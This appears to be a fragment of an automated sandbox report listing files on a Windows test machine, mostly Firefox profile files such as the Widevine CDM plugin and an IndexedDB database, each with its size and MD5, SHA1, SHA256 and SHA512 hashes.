SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD5bada69e66affcf72b66bff31c2569e7e
SHA1f8b668eff9d9c9e82b82bf6bc544577acbb199b7
SHA256fea016a45a1b44c916ca63673c23be8c7f334afd6bb311cb5b6ae9410974214e
SHA512bfd25b441460a9943836d8ccb9583f6a661752b2f55214416562652e3ccfd3d86bb772573cdddf30930e5a05171c5f9c4ccd027c1883dfa768f6aed876f1fc0e
-
Filesize
10KB
MD553d43140399310c73676eb7c76baabf6
SHA14f4316e0f9b984d7145c791268da1817cf05ac2e
SHA256e4b5d7373e77bfa46d9ebe8fdb2f8f0f9544640326197e9b59a9b6dc87b33023
SHA51296fda4758912adab98a82cf776c70e6f67556a6a8614a46c06deb56acaabc3802a3f7363a87dca474b80cece4aad82eacd367937a952f6985e1e215ea41b62cc
-
Filesize
10KB
MD5689d8b35528f38afb011d37acca8f754
SHA1bcd3a2e96c8cacff154b49f994dc2b6f055a4524
SHA2566713b82f0886ebdb2a21a65312c6d1123682071bf2d4969b278717dcc15ecf5c
SHA51222e36711bd098300ff0207fc5482a4b9ea92f45fd4ce5fc7a2648d06cdb6915e67470bb9c875444a7d2c5873b632b363ea7ba2e470e4383960e0c54af1543ffa
-
Filesize
10KB
MD57d27ea63624e284c91fecde8c48f08b8
SHA1fc5c6d714fd642bb88cc0635d7b942b103548607
SHA2561d7905bfeb72893182a77018e4bcc434a607e0d25faa1a256dabfc99ff215800
SHA5123e9b574a69a5124668db1fe61825dd2b2c70c2aa6c4d4a5f5555c445eba780ae3e348b552fd2e47bef96cea472b53fe42a971a93918e878593b966eed809e0b8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize2.5MB
MD591db0e30bd89fe83b37af6c4d8de15f5
SHA1d5b32ffbf75e669be3a3f532b6a5d69087ec0494
SHA2565a34b684a0b729b28a8ac2fb1f64ee4aab3504773766c11c061087820618806c
SHA512590dd565ecaa6fe8b06c496821f4708f00e6465777ebc623aec48da4b4a1494fd1662434c3116c41f607647210de1ae2da84e7ebadae72009f5a4b48058170a8
-
Filesize
414KB
MD530959eddf9fbd69c18b43035e3f28be0
SHA16d4973ed29f13535b7b7b04bdc90724212f7b54a
SHA2569ddcdf44f1ec97074da94803acec5531114d21ee748e99375a0008d966518914
SHA512b4e3ec1ba4dc97227efd8de2dc7dcc026bd2881addb3319d9f34556c4a7e154b521ecb689862f9b44e59a351775e7af519c11524f381e5a4293f0f289c3057f8
-
Filesize
703KB
MD593a39fec52c5a31eebddb1fefaf70377
SHA1ea09fb38f4468883ce54619b2196f9531909523f
SHA25641f0a1e447cd4a83ebb301907d8d5a37cb52235c126f55bd0bd04327b77136bc
SHA5121439d6333872963aa14c8199fdd864a36f7e7d8cc603c4013ed39333dee3d8ea937f11aadf19a6737f5884e2269ff7ca13fedbd5cad8838719838e9d44a156b3